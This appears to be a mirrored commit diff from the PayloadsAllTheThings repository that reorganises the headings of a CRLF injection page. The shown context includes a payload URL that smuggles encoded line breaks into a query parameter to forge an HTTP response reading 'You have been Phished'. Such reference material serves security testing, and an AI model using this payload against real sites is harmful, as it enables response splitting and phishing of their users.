mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-12-12 15:49:38 -08:00
Normalize page header for CSRF, DNS, DOS, Dependencies
This commit is contained in:
@@ -7,15 +7,18 @@
|
||||
|
||||
## Summary
|
||||
|
||||
- [Add a cookie](#add-a-cookie)
|
||||
- [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass)
|
||||
- [Write HTML](#write-html)
|
||||
- [Filter Bypass](#filter-bypass)
|
||||
- [Labs](#labs)
|
||||
- [References](#references)
|
||||
* [Methodology](#methodology)
|
||||
* [Add a cookie](#add-a-cookie)
|
||||
* [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass)
|
||||
* [Write HTML](#write-html)
|
||||
* [Filter Bypass](#filter-bypass)
|
||||
* [Labs](#labs)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Add a cookie
|
||||
## Methodology
|
||||
|
||||
### Add a cookie
|
||||
|
||||
Requested page
|
||||
|
||||
@@ -39,7 +42,7 @@ x-xss-protection: 1; mode=block
|
||||
```
|
||||
|
||||
|
||||
## Add a cookie - XSS Bypass
|
||||
### Add a cookie - XSS Bypass
|
||||
|
||||
Requested page
|
||||
|
||||
@@ -71,7 +74,7 @@ X-XSS-Protection:0
|
||||
### Write HTML
|
||||
|
||||
Requested page
|
||||
|
||||
|
||||
```http
|
||||
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user